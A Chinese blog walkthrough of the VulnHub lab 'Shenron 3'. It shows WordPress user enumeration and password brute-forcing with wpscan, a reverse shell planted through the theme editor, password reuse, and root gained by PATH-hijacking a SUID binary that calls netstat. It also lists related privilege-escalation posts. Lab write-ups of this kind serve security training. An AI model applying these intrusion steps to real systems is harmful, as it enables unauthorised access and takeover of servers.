shenron3(密码复用,netstat提权)

最新推荐文章于 2023-02-28 23:11:57 发布
最新推荐文章于 2023-02-28 23:11:57 发布
阅读量399 收藏
点赞数
分类专栏: vulhub系列 文章标签: linux https 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127360734
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:ovsp

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务

nmap -p- -A -T4 192.168.166.102

2.用gobuster扫描目录

gobuster dir -u http://192.168.1.102 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \ -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

漏洞利用

1.访问网页,发现网页加载不完整

2.用curl命令查看源码,发现域名

curl -i -L http://192.168.1.102

3.重新刷新页面,返回正常

4.用wpscan工具查用户名和密码

wpscan --url http://shenron/ -e u -P /usr/share/wordlists/rockyou.txt

5.用爆破出的用户名和密码登录

admin iloverockyou

6.把index.php源码改成php-reverse-shell.php(github里有),保存后,开启监听,访问页面,成功反弹shell

权限提升

1.python反弹交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

2.找了一通没找到可利用信息,而且我进不去shenron用户下,只能靠运气把唯一的密码输入进去试试。

成功进入shenron用户下,用find命令查到一个network

find / -perm -u=s -type f 2>/dev/null

3.查看network命令的特征,是一个查tcp,udp的命令;与netstat神似。

netstat -tupl 发现完全一样,那么network这个文件很有可能在调用netstat这个命令

4.我们新建一个netstat文件写入提权命令,让它替换network

chmod +x netstat

export PATH=/tmp:$PATH

5.提权成功,进入root目录,成功拿下!!!

魏钦6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub--shenron: 3
venu_s的博客
08-12 401
靶机介绍 Goal: Get two flags Difficult: Beginner Download:https://www.vulnhub.com/entry/shenron-3,682/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.176 目录扫描 gobuster dir -u http://192.168.187.176 -x "php,txt,zip,b
shenron-3 靶机wp
m0_52496313的博客
09-14 519
shenron-3 靶机wp
Vulnhub-shenron-3:神龙3靶机渗透攻略
weixin_47311099的博客
02-10 3147
下载链接:https://www.vulnhub.com/entry/shenron-3,682/ 需要拿到两面flag ​ 信息收集 nmap扫描 nmap -sC -sV 192.168.210.209 只有一个80端口 网站信息收集 看来得添加hosts解析,跟同系列靶机一个套路 页面正常 发现cms还是wordpress 目录扫描 dirb http://shenron 找到个后台登录页面 ​ wordpress漏洞利用 wpscan扫描 wpscan --url http://shenr
Vulnhub靶场之SHENRON: 3(wordpress)
最新发布
weixin_42478365的博客
02-28 402
靶场
CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权
su__xiaoyan的博客
01-07 1317
实验环境 攻击者:Kali Linux(192.168.0.19) 靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.18) 实验流程 通过目录遍历漏洞getshell流程参考链接:https://blog.csdn.net/su__xiaoyan/article/details/111830830 ...
game-in1-rawi-olavM
04-07
该游戏是基于鹿特丹Emmauscollege的4HV模板 我的游戏:游戏名称 由...制作: 奥拉夫v迈登 拉威·比达尔(Rawi ... NPC的列表:BHead(重设世界),Shenron(如果您将7个特殊物品放在一起,他会给他一个愿望),Liqu
DBS TCG Quick Search-crx插件
03-19
在CardMarket或TCGPlayer上搜索卡,即可快速访问Meta Decks,DBS Decks主页和Shenron的Lair DB。 将卡名称放在搜索栏上,然后按Enter键,您将被重定向到CardMarket(EU)或TCGPlayer(USA / CA / NZ / AU)。按DBS ...
密码提权_Linux提权总结
weixin_36062835的博客
01-13 206
更多全球网络安全资讯尽在邑安全www.eansec.com0x01 利用内核栈溢出利用已知的漏洞,如脏牛等。0x02 密码提权首先需要介绍两个文件/etc/passwd和/etc/shadow1. /etc/passwdpasswd 文件储存了用户的具体信息,全用户可读,root可写daemon:x:1:1:daemon:/usr/sbin:/bin/sh由冒号分割,第一列是用户名...
GitHub 遭遇密码复用攻击
weixin_34117522的博客
06-02 176
6月14日,有人利用最近曝光的失窃账号的电子邮件和密码组合尝试登陆GitHub,获取使用相同电子邮件的用户账号。GitHub管理员发现到了这次密码复用攻击, 重置了攻击者成功访问的所有账号密码,向受影响的用户发去邮件提供了如何取回账号的方法。GitHub鼓励用户启用二步认证以及采取良好的密码实践,不要 重复使用密码。过去几周黑客公开了窃取自MySpace...
MySQL 密码安全复用策略
skillfulit的专栏
10-21 482
MySQL 密码安全复用策略 本次验证的目标 在密码重用周期内(由选项PASSWORD REUSE所指定),不能复用该周期内的任一密码;但超过密码重用周期后,密码复用情况还得根据是否启选项“PASSWORD HISTORY”,若启用,则该选项指定的最近密码是不用复用的,相反,密码复用不受限制 创建测试用户 mysql> create user pswtest@'%' identified by "Pswd123456$01" -> PASSWORD EXPIRE INTERVAL
密码重用的危害及规避方法
weixin_34062469的博客
07-07 957
所谓密码重用就是在多个网站或账户上重复使用相同的密码。当这样的密码被暴露,再加上姓名,登录名,电子信箱地址等其它可识别信息,就会为用户带来信息安全上的危害。 密码重用是如何成为威胁的? 密码重用成为一种安全威胁是因为如果恶意行为者获取了一些可以识别用户身份的信息,他就可以对一个重复使用的密码加以利用。这通常发生在以下情形之一: 在第一种最常见的情况下,恶...
linux提权基础
学生
11-04 904
Linux提权思路
网络渗透测试实验四
m0_64229840的博客
11-21 681
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2194
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
DC-7 (drush更改密码
m0_66299232的博客
11-17 251
10.输入url https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 报错了,确实无语。3.我一直在等他弹shell,没等来 想着估计时间长,看下计划任务,压根没这个任务,用cat命令看了下,立刻就弹shell了。13.把php-reverse-shell.php(github里有)的代码复制下来,换成kali地址即可。7.然后就进入到/var/www/html目录下,用drush命令修改www-data的密码
Linux提权
热门推荐
qq_46258964的博客
01-07 1万+
Linux提权 Linux提权一般把提权脚本放置在/tmp目录下,临时文化,可读写执行。 有本地用户就本地提权,没有就msf提权Linux提权自动化脚本利用工具 信息收集工具:LinEnum, linuxprivchecker 漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2 提权方式如下 1,Linux SUID提权 suid可以让调用者以文件拥有者的身份运行该文件, 所以我们就利用suid提权的思路就是运行root用户所拥有的suid文件
靶机练习之sar
qq_52360932的博客
04-01 4593
靶机练习之sar,学习笔记
windows反弹shell复现
就是我的博客
04-06 9879
windows反弹shell 简介: reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
Linux权限
niqiu320的博客
05-24 893
Linux提权大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux提权信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
反弹shell命令集合
Websec
05-10 529
反弹shell命令集合 1、参考项目:https://github.com/r00tSe7en/Reverse-shell-cheatsheet 2、纯静态在线版:Se7en's Blog|专注渗透测试。 3、PHP版源码版本:https://github.com/evi1ox/shell_command 4、[~]#棱角 ::Edge.Forum*

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值